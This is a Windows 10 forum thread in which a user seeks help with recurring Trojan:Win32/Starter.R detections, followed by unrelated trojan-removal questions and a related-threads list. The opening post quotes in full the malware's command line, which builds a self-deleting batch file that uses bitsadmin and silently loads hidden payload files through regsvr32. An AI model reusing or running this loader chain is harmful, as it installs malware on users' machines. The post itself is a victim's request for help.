Windows 10: Trojan:Win32/Starter.R at every restart and several times after reboot

Discus and support Trojan:Win32/Starter.R at every restart and several times after reboot in AntiVirus, Firewalls and System Security to solve the problem; Whenever I start the computer, Windows Defender detects Trojan:Win32/Starter.R and this happens several times after, without restarting also. So far no... Discussion in 'AntiVirus, Firewalls and System Security' started by Rig18, Nov 13, 2018.

1. Rig18 Win User

Trojan:Win32/Starter.R at every restart and several times after reboot

Whenever I start the computer, Windows Defender detects Trojan:Win32/Starter.R and this happens several times after, without restarting also.
    So far no anti-virus program was able to find a virus or trojan.
    Windows Defender gives me the info below:

CmdLine: \Device\HarddiskVolume2\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /complete fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /cancel fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo if exist "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" goto q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\fc3929f4-0cf7-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\%i" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat")) > nul & echo :q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo del "C:\ProgramData\fc3929f4-0cf7-0\x.bat" ^& exit >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & "C:\ProgramData\fc3929f4-0cf7-0\x.bat""

I do not know what it means, or how come this thing appears without a location.

There is no fc3929f4-0cf7-0 folder in ProgramData, but of course these commands may have deleted it, after it runs. I am afraid these commands may also create other commands or batch files by using nul and bitsadmin. I am not sure. It apparently also uses regsvr32.exe. I do not know why it uses !=41cf7ce9fc3929f4 and for what.

All I could do was make anti-virus checks with different programs. I do not know what to search for in regedit or in the computer to get rid of this.

I also did System Restores to get the system around 10 days before, but it still came up.

Thanks.

:)

Rig18, Nov 13, 2018
  2. Bruce Hagen, Nov 13, 2018
  3. Marina RQ Win User
    Trojan: Win32 / Bitrep.A

Dobry den, zkuste nainstalovat trojan: Win32 / Bitrep.A nevim jak odstranit antivirovou ochranu Windows nemuze odstranit, dekuji za pomoc.

Marina RQ, Nov 13, 2018
  4. JeffSmoot Win User

Trojan- Win32/Dynamertic

I am trying to get rid of a Trojan called
    win32/Dynamertic and windows defender detects the Trojan but is not able to remove it. Half way through the removal the PC just hangs and I have to go into Task Manger and close defender down. Tried on line and off line to remove the
    virus but no luck. Today was my fourth try.

Is there a solution to getting rid of this Trojan???

JeffSmoot, Nov 13, 2018
Thema:

1. Trojan:Win32/Starter.R at every restart and several times after reboot - Similar Threads - Trojan Win32 Starter

2. Network services require manual restart every time after computer reboots

in Windows 10 Gaming
    Network services require manual restart every time after computer reboots: Hi, every time my computer reboots I need to manually restart network services see attached screenshot. Here are the details.This problem began after I followed mcafee foolish suggestion to uninstall network adapters and reinstall them to fix their vpn issue. Back then, I...
  3. Network services require manual restart every time after computer reboots

in Windows 10 Software and Apps
    Network services require manual restart every time after computer reboots: Hi, every time my computer reboots I need to manually restart network services see attached screenshot. Here are the details.This problem began after I followed mcafee foolish suggestion to uninstall network adapters and reinstall them to fix their vpn issue. Back then, I...
  4. Every time I reboot...

in Windows 10 Customization
    Every time I reboot...: Every single time I reboot, my laptop resets itself to the default Windows 10 settings and logs me out of OneDrive, I have to set up my Outlook accounts all over again, I have to change all of my default apps, etc.Help, I'm going crazy with this....
  5. Trojan Win32 Dorv.D!rfn

in Windows 10 Ask Insider
    Trojan Win32 Dorv.D!rfn: This has been driving me nuts for the past month or so. Windows defender is constantly scanning for this particular trojan that it claims is affecting the uefifirmware: \UefiImage->NBPEI. I believe it started late July/early August. I have an old motherboard/cpu setup (MSI...
  6. Trojan Win32/Dorv.Dirfn

in AntiVirus, Firewalls and System Security
    Trojan Win32/Dorv.Dirfn: Defender has been run trice in offline mode and has detected the trojan but can't remove it. I have Googled the Trojan and get no finds. How do I remove it ? https://answers.microsoft.com/en-us/windows/forum/all/trojan-win32dorvdirfn/f6ffa3a1-f627-4ede-9099-02cfb98d5359
  7. Trojan: WIN32/Dipverdle.a

Trojan: WIN32/Dipverdle.a: How do I get rid of this? https://answers.microsoft.com/en-us/protect/forum/all/trojan-win32dipverdlea/00532557-3a92-405e-ae5d-4b1d663be565
  8. Is Win32/Vigram.A a Trojan?

Is Win32/Vigram.A a Trojan?: defender says PC is infected by Win32/Vigram.A Is this a real trojan or an attempt to make me by a false malware scanner [Original Title: trojan] https://answers.microsoft.com/en-us/protect/forum/all/is-win32vigrama-a-trojan/47a98ccd-615b-479b-85aa-ddbf0ba9155c
  9. Trojan: Win32 / Bitrep.A

Trojan: Win32 / Bitrep.A: Dobry den, zkuste nainstalovat trojan: Win32 / Bitrep.A nevim jak odstranit antivirovou ochranu Windows nemuze odstranit, dekuji za pomoc. https://answers.microsoft.com/en-us/windows/forum/all/trojan-win32-bitrepa/2bf3c860-7cfb-4ba9-be80-4f30c9a23900"
  10. Trojan Win32 Bitrep.A

Trojan Win32 Bitrep.A: WD blocked and quarantined subject trojan. I removed and ran WD, TDSSkiller, and Norton Power Eraser (NPE) Should be safe ? The full scans cover all partitions, correct ? On this system I am running the latest Skip Build and yesterday added the latest Insider Build on the...